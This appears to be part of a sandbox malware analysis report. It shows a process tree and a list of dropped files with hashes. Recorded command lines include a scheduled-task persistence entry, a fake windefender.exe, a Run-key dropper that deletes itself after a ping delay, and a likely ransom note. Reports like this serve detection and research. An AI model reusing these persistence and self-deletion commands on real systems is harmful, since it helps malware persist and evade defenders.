                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                        5⤵
                          PID:11752
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 1251
                            6⤵
                              PID:11812
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                              6⤵
                              • Creates scheduled task(s)
                              PID:2552
                      • C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe
                        "C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe" --silent --allusers=0
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        PID:7892
                        • C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe
                          C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x690a21c8,0x690a21d4,0x690a21e0
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:7944
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\RAus8SFt5ecM23w4L2GQk0YC.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\RAus8SFt5ecM23w4L2GQk0YC.exe" --version
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:6392
                  • C:\Windows\system32\taskmgr.exe
                    "C:\Windows\system32\taskmgr.exe" /4
                    1⤵
                    • Drops file in Windows directory
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:17004
                    • C:\Windows\system32\taskmgr.exe
                      "C:\Windows\system32\taskmgr.exe" /1
                      2⤵
                      • Loads dropped DLL
                      • Drops file in Windows directory
                      • Checks SCSI registry key(s)
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:22124
                  • C:\Windows\windefender.exe
                    C:\Windows\windefender.exe
                    1⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    PID:9960
                  • C:\Windows\System32\rundll32.exe
                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    1⤵
                      PID:16432
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SDRSVC
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6264
                    • C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                      "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                      1⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of AdjustPrivilegeToken
                      PID:20592
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                        2⤵
                          PID:19836
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 2.2.2.2 -n 1 -w 3000
                            3⤵
                            • Runs ping.exe
                            PID:20644
                      • C:\Windows\system32\OpenWith.exe
                        C:\Windows\system32\OpenWith.exe -Embedding
                        1⤵
                        • Modifies registry class
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of SetWindowsHookEx
                        PID:21000
                      • C:\Windows\system32\NOTEPAD.EXE
                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\file.txt
                        1⤵
                        • Opens file in notepad (likely ransom note)
                        PID:16572
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                        1⤵
                          PID:22236
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                            2⤵
                            • Checks processor information in registry
                            • Modifies registry class
                            • NTFS ADS
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:22132
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.0.761458766\1283516238" -parentBuildID 20221007134813 -prefsHandle 1724 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fe25fe2-29bf-4f18-909f-bb0ad5413023} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 1816 18b58bd6a58 gpu
                              3⤵
                                PID:22476
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.1.1119650118\363977459" -parentBuildID 20221007134813 -prefsHandle 2140 -prefMapHandle 2128 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5885d735-ae73-4ce5-b95e-2748595eeffd} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 2164 18b58737258 socket
                                3⤵
                                  PID:9748
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.2.2080356938\1498724895" -childID 1 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {790d56b0-7042-4de1-9b0f-db29a74875b1} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 2904 18b5ce97b58 tab
                                  3⤵
                                    PID:10656
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.3.1650669351\208864390" -childID 2 -isForBrowser -prefsHandle 3256 -prefMapHandle 3252 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64b429e0-f1bf-44cc-8544-5a4baaad3f76} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 996 18b46862558 tab
                                    3⤵
                                      PID:4820
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.4.39111859\459681240" -childID 3 -isForBrowser -prefsHandle 4132 -prefMapHandle 4128 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fae0f5c-800d-4896-ba08-7d51eefca126} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4144 18b5e8ca858 tab
                                      3⤵
                                        PID:22104
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.5.1206322014\349148100" -childID 4 -isForBrowser -prefsHandle 4884 -prefMapHandle 4868 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3137ae56-adaa-496f-87cf-fca10b21d9a8} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4896 18b5ef72858 tab
                                        3⤵
                                          PID:15844
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.6.48820180\180765753" -childID 5 -isForBrowser -prefsHandle 5036 -prefMapHandle 5040 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37046f28-5d37-4d14-9210-71481893df5d} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5028 18b5f395558 tab
                                          3⤵
                                            PID:17564
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.7.150762552\563370986" -childID 6 -isForBrowser -prefsHandle 5232 -prefMapHandle 5236 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b990d43f-0e0c-4551-998c-7cff8c244d29} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5224 18b5f397058 tab
                                            3⤵
                                              PID:2936
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.8.1609566664\1850000674" -childID 7 -isForBrowser -prefsHandle 5604 -prefMapHandle 5600 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f317a4ba-7feb-480f-b7d6-c1fcbb7e2ddb} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4640 18b60e6b158 tab
                                              3⤵
                                                PID:2504
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.9.74855379\1169752606" -childID 8 -isForBrowser -prefsHandle 4244 -prefMapHandle 5916 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45398137-37c3-44b5-bb6c-51db84f2a330} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4232 18b5ce98a58 tab
                                                3⤵
                                                  PID:1664
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.10.193100520\78004601" -childID 9 -isForBrowser -prefsHandle 5980 -prefMapHandle 5976 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3ba369d-0eea-4e35-a565-956629a50785} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5988 18b5d20b858 tab
                                                  3⤵
                                                    PID:12160
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.11.1807750368\2005817894" -childID 10 -isForBrowser -prefsHandle 5424 -prefMapHandle 5420 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de03f5fe-bb9e-412e-a2a2-1ebbdf000f35} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5308 18b60ee1858 tab
                                                    3⤵
                                                      PID:18260
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.12.1603924224\751028772" -childID 11 -isForBrowser -prefsHandle 5412 -prefMapHandle 5604 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac1cbe18-d9f4-4d0e-9dfe-1fb8d6e2d203} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5824 18b5d594558 tab
                                                      3⤵
                                                        PID:15264
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.13.871336187\333813456" -childID 12 -isForBrowser -prefsHandle 6008 -prefMapHandle 5972 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c57963fa-6b75-4c4f-92c1-4dfb96797cc1} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5996 18b5d348858 tab
                                                        3⤵
                                                          PID:16600
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.14.274536080\251658328" -childID 13 -isForBrowser -prefsHandle 9876 -prefMapHandle 9872 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22d5c6d-ad17-4823-9868-206f82a41406} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 9884 18b5d503558 tab
                                                          3⤵
                                                            PID:16608
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.15.1686809643\2123248245" -childID 14 -isForBrowser -prefsHandle 9876 -prefMapHandle 9872 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9bbebc3-394e-427b-94d6-f2d1a4e60004} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 6032 18b5ffb5158 tab
                                                            3⤵
                                                              PID:19252
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.16.1946648958\571724906" -childID 15 -isForBrowser -prefsHandle 10092 -prefMapHandle 10100 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0174db77-d861-491f-a9f2-1b10338c9a3a} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 10096 18b5ffb6058 tab
                                                              3⤵
                                                                PID:19260
                                                          • C:\Users\Admin\Desktop\dnSpy.exe
                                                            "C:\Users\Admin\Desktop\dnSpy.exe"
                                                            1⤵
                                                              PID:4372

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\ProgramData\Are.docx

                                                              Filesize

                                                              11KB

                                                              MD5

                                                              a33e5b189842c5867f46566bdbf7a095

                                                              SHA1

                                                              e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                              SHA256

                                                              5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                              SHA512

                                                              f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                            • C:\ProgramData\mozglue.dll

                                                              Filesize

                                                              593KB

                                                              MD5

                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                              SHA1

                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                              SHA256

                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                              SHA512

                                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                            • C:\Users\Admin\AppData\Local\GA3lpfXnbBBqwEiceGtIdE9c.exe

                                                              Filesize

                                                              128KB

                                                              MD5

                                                              3e81bb17e66bd5de5cf58f3716d65d35

                                                              SHA1

                                                              efe4823a199d1843f05f41b5d5f859cf9e24cc97

                                                              SHA256

                                                              fec9c1e76f832841330165fdc5184c1353c4adff6ffb29b83c80496135eb3e30

                                                              SHA512

                                                              0a954e235d922a2d68e97526fe5d05b67ebd54898166317a56a44e66e54fee2c752a00d93b1dd1ae620240ad6a68b57e3564920c8c2fdc0513131e5516e4c97b

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RE0OB4HE\862GPXBU.txt

                                                              Filesize

                                                              12B

                                                              MD5

                                                              8cf4dec152a9d79a3d62202b886eda9b

                                                              SHA1

                                                              0c1b3d3d02c0b655aa3526a58486b84872f18cc2

                                                              SHA256

                                                              c30e56c9c8fe30ffa4a4ff712cf2fa1808ee82ca258cd4c8ebefcc82250b6c01

                                                              SHA512

                                                              a5a65f0604f8553d0be07bd5214db52d3f167e7511d29cb64e3fa9d8c510cc79976ff2a5acb9b8c09b666f306ac8e4ad389f9a2de3ca46d57b1e91060a4c50fd

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\3877292338.pri

                                                              Filesize

                                                              162KB

                                                              MD5

                                                              0d02b03a068d671348931cc20c048422

                                                              SHA1

                                                              67b6deacf1303acfcbab0b158157fdc03a02c8d5

                                                              SHA256

                                                              44f4263d65889ea8f0db3c6e31a956a4664e9200aba2612c9be7016feeb323c0

                                                              SHA512

                                                              805e7b4fafed39dec5ecc2ede0c65b6e103e6757e0bd43ecdce7c00932f59e3e7a68d2ea0818244dfeb691b022c1ccca590a3f4239f99e1cd8a29ba66daed358

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\810424605.pri

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              a2942665b12ed000cd2ac95adef8e0cc

                                                              SHA1

                                                              ac194f8d30f659131d1c73af8d44e81eccab7fde

                                                              SHA256

                                                              bdc5de6c42c523a333c26160d212c62385b03f5ebdae5aa8c5d025ff3f8aa374

                                                              SHA512

                                                              4e5ba962ba97656974c390b45302d60f4c82d604feb6199d44e80497a40d0b0a9fd119ca17ac184809ca0821ab6813292892c433ed7277f65c275f37a96070b9

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\doomed\228

                                                              Filesize

                                                              21KB

                                                              MD5

                                                              fa5324d407bed08dc8d1d52e555006ff

                                                              SHA1

                                                              b1fc39804432c09225f49370321def2d9ffdfecd

                                                              SHA256

                                                              5a0c8fb34172ba7b8842296f923bb516af626a0659a31a626e62ef0d873d9c81

                                                              SHA512

                                                              cc5cb3e785146bd0953e46ef955d3691788c8d6aaca497f06a0ffe53e7546d91b8e72c368d3d8b6764417582ad5f912b6582f8cef119e6be67e11034cef7a608

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\doomed\5631

                                                              Filesize

                                                              12KB

                                                              MD5

                                                              83001bc04d9db0ce51abf9fc9f3f64f8

                                                              SHA1

                                                              8b04764b1f02486c77ea738655c767fd59bfcee6

                                                              SHA256

                                                              c7be23c1aa1ee883f6b3a214d41e9a68f76d4f660e9baee3087779c23f86f614

                                                              SHA512

                                                              5f147db6e159f72555a39aac9bbed9e9528422d51bf46756fd9310f219c559af0c8dd84d4826bc93d3ad0cc8163e451744c4e4e3b391e5ffa32c529ea5dface4

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\45514F58EE166DE19E4DE720A21DDF1DA12F6C6C

                                                              Filesize

                                                              203KB

                                                              MD5

                                                              803adfcd5dd7eb602140908ad4ff14d5

                                                              SHA1

                                                              f71748f3ec1e756889b403b18a23e0df4cbcf39b

                                                              SHA256

                                                              7d98e929f7296f6f1038c0e4a46a5e25e8c5c1e69b5c7d5f982d9e64eb880f5f

                                                              SHA512

                                                              1165a9ee3d23f3d4ef40b5d72eb29d492c2d74b274e7778993331fc70ad22337231ce84b05c488e7f904bc5647ec10ef30166626674ef8ade5e33a157a512a64

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\46C625DB4964C00323A8EF4C60828B52A454EBB4

                                                              Filesize

                                                              1.1MB

                                                              MD5

                                                              88cd50293e2f67d85bf0ff235f8c9cae

                                                              SHA1

                                                              28370cf3c4646b8014c3efc4b6717f64a7a3120b

                                                              SHA256

                                                              972b2ee8f0486e7155eca41a242271aefef04655f5167e2c10e07b0d8ec2ae1d

                                                              SHA512

                                                              1cfcee4098349ec9bcab99013b2d0f8c9d857c666d0a063c27850df056312ff276b7d30a29b334be8a9a3e01c1135a9f13aafbe8c632e84c486969d249c7b971

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\80AF8614EB0CDD7B24B3BE186294D327C8A18584

                                                              Filesize

                                                              82KB

                                                              MD5

                                                              7e4b386c365cbfc4304b6254340ad4d8

                                                              SHA1

                                                              0d683204b22c0c4c550246c13cd2a840a24c1b6c

                                                              SHA256

                                                              ec2a3b166652314ade27e325d897a74b414d64a2b6ef9d5a2682a658d22d4ee1

                                                              SHA512

                                                              7e7c4e260a639baf343e2231a7a67850f267c487a604e1417327c85a87dda605a2b40c751c22f48aec84f5d3b2675f6b8a27c07e5cceae754c182a3f85aeb42d

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\80BB96996C8133B0FE5E0D6E5EA21B26135E8EA2

                                                              Filesize

                                                              111KB

                                                              MD5

                                                              a821f203b20f5db493350bc6fcba5f29

                                                              SHA1

                                                              2c9ffca3236e0f601a72c56fe9928d99c7d4efb0

                                                              SHA256

                                                              6a76a8c1fb6a0f6bfb4e10a9aef3cd264a10e5697ff2ae4e08af6b9d0b6f9197

                                                              SHA512

                                                              263e8a91b018a255b9f67ff63157f578454e719ddaa418fc9023f3eb1d8fd212e102d5ca050bd5a087fb7282d24c5d2a322a4e274e29fa3e57767ed830f7ffc2

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\87756117B997D16946BBD58DB5E9B356AED41120

                                                              Filesize

                                                              186KB

                                                              MD5

                                                              2f75bd0368b74b6fd5c58d9e1e040a90

                                                              SHA1

                                                              0a7823f6751afdeaf9b80c77c5e0562ba58b1546

                                                              SHA256

                                                              89a11b0ab58593c93608a8e5b55715abefb00557ac82e656b74bc5bb30bd0adb

                                                              SHA512

                                                              91b4fb6f91b83e0da30b49320239ae2e87191cd1ea813b38b823eeeb0f289fee227ab80e85ed17819fe8044a79e984a2f56d838539170e7a355e06eca4a27df2

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\971254C7341460E85C93D0821B91E9985A0B32D6

                                                              Filesize

                                                              2.0MB

                                                              MD5

                                                              ed082326c96909b827ed3a43b07c7df5

                                                              SHA1

                                                              c8b0570515f0f2601fab8d406bdd95e19c1efacb

                                                              SHA256

                                                              9cbedd2ead28b2870f5a12f218b4d3fd8e0a5c178bbcad397438329d4211634c

                                                              SHA512

                                                              3c08f0b03bef1517ae626fc173a344c795e5fbc0f5667f3570eb2e973917cf4fb1b65bce0099c51a1bc14d93d11c996feeeba1a6df40ec96fe5739720b6b3d83

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe

                                                              Filesize

                                                              2.8MB

                                                              MD5

                                                              5bc00af1415ed282eefc3fb25cb45e8d

                                                              SHA1

                                                              4297fe9cf047e5a5beb72c2c3020cffed6de2b5a

                                                              SHA256

                                                              62d16ad20ef01d317b4416ae3fafac9cfcab8539688104fb0a94f9a1e0b97d1d

                                                              SHA512

                                                              ea8c627926ecc3847db07be545788ecabc1b95e5805070efebe13324c458fd49e10ca8a3aecd0d23bf8ac72bc317b6204325bf67c7f4ef9fcb4d277591822257

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe

                                                              Filesize

                                                              2.8MB

                                                              MD5

                                                              9f4e2eed379a7b0a1a926e5376d50f26

                                                              SHA1

                                                              541e0c17778896f4022b5adda537c0545d08cabc

                                                              SHA256

                                                              e269e7f806b9d2672095d63c6244877b886003921060a72a69d69e24635c0f75

                                                              SHA512

                                                              bd7446f4201c3d14f9e22ca6906164da19c5eb44cdef180bb43420e59ba7a852f84388c41c7f3e8cd09b62b2ca20daca7e288c0f527ed2da0d2e07bdd2e7be7e

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\additional_file0.tmp

                                                              Filesize

                                                              2.5MB

                                                              MD5

                                                              20d293b9bf23403179ca48086ba88867

                                                              SHA1

                                                              dedf311108f607a387d486d812514a2defbd1b9e

                                                              SHA256

                                                              fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

                                                              SHA512

                                                              5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe

                                                              Filesize

                                                              1.9MB

                                                              MD5

                                                              b3f05009b53af6435e86cfd939717e82

                                                              SHA1

                                                              770877e7c5f03e8d684984fe430bdfcc2cf41b26

                                                              SHA256

                                                              3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7

                                                              SHA512

                                                              d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\dbghelp.dll

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              925ea07f594d3fce3f73ede370d92ef7

                                                              SHA1

                                                              f67ea921368c288a9d3728158c3f80213d89d7c2

                                                              SHA256

                                                              6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9

                                                              SHA512

                                                              a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\opera_package

                                                              Filesize

                                                              96.4MB

                                                              MD5

                                                              5834851d3c160e070c3b0263ed62bd6d

                                                              SHA1

                                                              91d31ed84473f8ddf7ce85bb0e0d2953247c6f66

                                                              SHA256

                                                              ebab603527bd3a1066fb6142a3bae3c983b3566b1c4f53e82ae75fb8b6bb7352

                                                              SHA512

                                                              bba794f81268494fec3dc51dbb2a5b2c1c427ea1453adfc113bad30b2ad34fa56c94f7b95f10190beee1884b196a0f3a4f6466dc19c569d418745eb9ce0bd555

                                                            • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              eee5ddcffbed16222cac0a1b4e2e466e

                                                              SHA1

                                                              28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5

                                                              SHA256

                                                              2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54

                                                              SHA512

                                                              8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

                                                            • C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe

                                                              Filesize

                                                              101KB

                                                              MD5

                                                              42b838cf8bdf67400525e128d917f6e0

                                                              SHA1

                                                              a578f6faec738912dba8c41e7abe1502c46d0cae

                                                              SHA256

                                                              0e4ffba62ce9a464aa1b7ff9f1e55ace8f51ff1e15102d856f801a81f8b4607d

                                                              SHA512

                                                              f64b39d885375251ab7db72c57dc5b5095f0c6412169f1035d1f6a25b8415a2a01004d06bfa0267cf683ef7dea7a9f969ad43fde5a4376f1fcb65a57403433c0

                                                            • C:\Users\Admin\AppData\Local\Temp\Opera_installer_24031213080313014428.dll

                                                              Filesize

                                                              320KB

                                                              MD5

                                                              1575da260ab5d482d31eaec008ef5d0d

                                                              SHA1

                                                              dfc3f3a84e40bc1940c212ccdf4a79080a02f233

                                                              SHA256

                                                              83d70327b2e33129c30cf60b21cadaa7ff37c122a65c17a49b1aa6100a4b8c72

                                                              SHA512

                                                              e72f7546285433f9c9047154f7755729fbc6c6dc7900c94dd01cff3940853a47842461e6d44d6414843942ac4ddece9f30018b0249f2795b290f454edc77c04d

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xensmedw.0qa.ps1

                                                              Filesize

                                                              1B

                                                              MD5

                                                              c4ca4238a0b923820dcc509a6f75849b

                                                              SHA1

                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                              SHA256

